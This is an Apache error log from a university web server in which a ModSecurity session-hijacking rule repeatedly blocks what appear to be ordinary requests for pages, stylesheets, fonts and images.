[Mon Aug 28 08:49:55.701123 2023] [:error] [pid 38686] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/prosedurpmb"] [unique_id "ZOv9Q8Co-f0AAJceGKMAAAAA"]
[Mon Aug 28 08:49:55.729467 2023] [:error] [pid 38641] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv9Q8Co-f0AAJbxo@cAAAAJ"]
[Mon Aug 28 08:50:05.196166 2023] [:error] [pid 38389] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv9TcCo-f0AAJX1ljkAAAAS"]
[Mon Aug 28 08:50:05.491141 2023] [:error] [pid 38685] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv9TcCo-f0AAJcdfIoAAAAR"]
[Mon Aug 28 08:50:05.567483 2023] [:error] [pid 38641] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv9TcCo-f0AAJbxo@kAAAAJ"]
[Mon Aug 28 08:50:07.764454 2023] [:error] [pid 38686] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/detail/3"] [unique_id "ZOv9T8Co-f0AAJceGKYAAAAA"]
[Mon Aug 28 08:50:08.430564 2023] [:error] [pid 38641] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv9UMCo-f0AAJbxo@oAAAAJ"]
[Mon Aug 28 08:50:08.457440 2023] [:error] [pid 38389] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv9UMCo-f0AAJX1ljoAAAAS"]
[Mon Aug 28 08:50:13.923867 2023] [:error] [pid 38389] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv9VcCo-f0AAJX1ljsAAAAS"]
[Mon Aug 28 08:50:15.992721 2023] [:error] [pid 38683] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv9V8Co-f0AAJcb48gAAAAP"]
[Mon Aug 28 08:50:16.122487 2023] [:error] [pid 38690] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv9WMCo-f0AAJciCsMAAAAG"]
[Mon Aug 28 08:50:18.946424 2023] [:error] [pid 38686] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv9WsCo-f0AAJceGKkAAAAA"]
[Mon Aug 28 08:50:18.999952 2023] [:error] [pid 38687] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv9WsCo-f0AAJcfLJ0AAAAC"]
[Mon Aug 28 08:50:21.762111 2023] [:error] [pid 38646] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv9XcCo-f0AAJb21C4AAAAB"]
[Mon Aug 28 08:50:21.800151 2023] [:error] [pid 38685] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv9XcCo-f0AAJcdfI0AAAAR"]
[Mon Aug 28 08:50:23.107331 2023] [:error] [pid 38683] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv9X8Co-f0AAJcb48oAAAAP"]
[Mon Aug 28 08:50:26.137057 2023] [:error] [pid 38683] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv9YsCo-f0AAJcb48sAAAAP"]
[Mon Aug 28 08:50:26.159304 2023] [:error] [pid 38641] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv9YsCo-f0AAJbxo@4AAAAJ"]
[Mon Aug 28 08:50:55.475366 2023] [:error] [pid 38685] [client 125.164.17.1] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOv9f8Co-f0AAJcdfJMAAAAR"]
[Mon Aug 28 08:50:55.476736 2023] [:error] [pid 38689] [client 125.164.20.185] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOv9f8Co-f0AAJchk8sAAAAF"]
[Mon Aug 28 08:50:55.476796 2023] [:error] [pid 38644] [client 125.164.17.1] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOv9f8Co-f0AAJb0F@EAAAAK"]
[Mon Aug 28 08:50:55.508429 2023] [:error] [pid 38648] [client 125.164.19.245] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOv9f8Co-f0AAJb4sUgAAAAL"]
[Mon Aug 28 08:51:14.654373 2023] [:error] [pid 38685] [client 125.164.17.1] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOv9ksCo-f0AAJcdfJUAAAAR"]
[Mon Aug 28 08:51:23.217629 2023] [:error] [pid 38685] [client 125.164.22.22] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOv9m8Co-f0AAJcdfJYAAAAR"]
[Mon Aug 28 08:51:42.250549 2023] [:error] [pid 38687] [client 125.164.16.107] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOv9rsCo-f0AAJcfLKMAAAAC"]
[Mon Aug 28 08:51:44.348293 2023] [:error] [pid 38646] [client 125.164.16.107] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv9sMCo-f0AAJb21DcAAAAB"]
[Mon Aug 28 08:51:56.060611 2023] [:error] [pid 38690] [client 125.164.18.1] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv9vMCo-f0AAJciCuIAAAAG"]
[Mon Aug 28 08:52:02.754338 2023] [:error] [pid 38686] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv9wsCo-f0AAJceGMMAAAAA"]
[Mon Aug 28 08:52:04.565012 2023] [:error] [pid 38647] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv9xMCo-f0AAJb3RZwAAAAH"]
[Mon Aug 28 08:52:26.427254 2023] [:error] [pid 38683] [client 125.164.22.22] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv92sCo-f0AAJcb49IAAAAP"]
[Mon Aug 28 08:53:23.416848 2023] [:error] [pid 38726] [client 103.147.8.134] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOv@E8Co-f0AAJdGkgQAAAAF"]
[Mon Aug 28 08:53:23.638110 2023] [:error] [pid 38727] [client 103.147.8.134] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv@E8Co-f0AAJdH0DYAAAAI"]
[Mon Aug 28 08:53:24.931303 2023] [:error] [pid 38114] [client 103.147.8.134] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOv@FMCo-f0AAJTiojUAAAAE"]
[Mon Aug 28 08:53:24.962349 2023] [:error] [pid 38686] [client 103.147.8.134] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv@FMCo-f0AAJceGMsAAAAA"]
[Mon Aug 28 08:54:41.903263 2023] [:error] [pid 38647] [client 123.253.233.84] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/index.php/c_mastah/grid_vstsemester"] [unique_id "ZOv@YcCo-f0AAJb3RaEAAAAH"]
[Mon Aug 28 08:54:42.754828 2023] [:error] [pid 38690] [client 123.253.233.84] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/index.php/c_tools/get_user"] [unique_id "ZOv@YsCo-f0AAJciCuoAAAAG"]
[Mon Aug 28 08:55:55.833146 2023] [:error] [pid 38687] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv@q8Co-f0AAJcfLLIAAAAC"]
[Mon Aug 28 08:55:56.307986 2023] [:error] [pid 38648] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv@rMCo-f0AAJb4sWgAAAAL"]
[Mon Aug 28 08:55:56.359152 2023] [:error] [pid 38641] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv@rMCo-f0AAJbxpAcAAAAJ"]
[Mon Aug 28 08:55:56.359264 2023] [:error] [pid 38114] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv@rMCo-f0AAJTiokAAAAAE"]
[Mon Aug 28 08:55:56.360806 2023] [:error] [pid 38727] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv@rMCo-f0AAJdH0D0AAAAI"]
[Mon Aug 28 08:55:56.558810 2023] [:error] [pid 38726] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/fonts/glyphicons-halflings-regular.woff2"] [unique_id "ZOv@rMCo-f0AAJdGkgsAAAAF"]
[Mon Aug 28 08:55:56.823486 2023] [:error] [pid 38114] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv@rMCo-f0AAJTiokEAAAAE"]
[Mon Aug 28 08:55:57.252523 2023] [:error] [pid 38683] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/fonts/glyphicons-halflings-regular.woff"] [unique_id "ZOv@rcCo-f0AAJcb498AAAAP"]
[Mon Aug 28 08:55:57.362602 2023] [:error] [pid 38648] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/fonts/glyphicons-halflings-regular.ttf"] [unique_id "ZOv@rcCo-f0AAJb4sWkAAAAL"]
[Mon Aug 28 08:55:57.951402 2023] [:error] [pid 38648] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv@rcCo-f0AAJb4sWoAAAAL"]
[Mon Aug 28 08:56:04.020075 2023] [:error] [pid 38683] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv@tMCo-f0AAJcb4@AAAAAP"]
[Mon Aug 28 08:56:06.651159 2023] [:error] [pid 38686] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv@tsCo-f0AAJceGNQAAAAA"]
[Mon Aug 28 08:56:54.413499 2023] [:error] [pid 38647] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv@5sCo-f0AAJb3RbUAAAAH"]
[Mon Aug 28 08:56:54.428923 2023] [:error] [pid 38648] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv@5sCo-f0AAJb4sXcAAAAL"]
[Mon Aug 28 08:56:54.442929 2023] [:error] [pid 38688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv@5sCo-f0AAJcg6dQAAAAD"]
[Mon Aug 28 08:56:54.443036 2023] [:error] [pid 38114] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv@5sCo-f0AAJTiok0AAAAE"]
[Mon Aug 28 08:56:54.453022 2023] [:error] [pid 38687] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv@5sCo-f0AAJcfLMAAAAAC"]
[Mon Aug 28 08:56:54.454810 2023] [:error] [pid 38686] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv@5sCo-f0AAJceGNwAAAAA"]
[Mon Aug 28 08:56:54.462901 2023] [:error] [pid 38648] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv@5sCo-f0AAJb4sXgAAAAL"]
[Mon Aug 28 08:56:54.462953 2023] [:error] [pid 38114] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv@5sCo-f0AAJTiok4AAAAE"]
[Mon Aug 28 08:56:54.462978 2023] [:error] [pid 38647] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv@5sCo-f0AAJb3RbYAAAAH"]
[Mon Aug 28 08:56:54.472552 2023] [:error] [pid 38688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv@5sCo-f0AAJcg6dUAAAAD"]
[Mon Aug 28 08:56:54.473370 2023] [:error] [pid 38686] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv@5sCo-f0AAJceGN0AAAAA"]
[Mon Aug 28 08:56:54.475864 2023] [:error] [pid 38687] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv@5sCo-f0AAJcfLMEAAAAC"]
[Mon Aug 28 08:56:54.523063 2023] [:error] [pid 38687] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv@5sCo-f0AAJcfLMIAAAAC"]
[Mon Aug 28 08:56:54.523127 2023] [:error] [pid 38641] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv@5sCo-f0AAJbxpBQAAAAJ"]
[Mon Aug 28 08:56:54.523137 2023] [:error] [pid 38648] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOv@5sCo-f0AAJb4sXkAAAAL"]
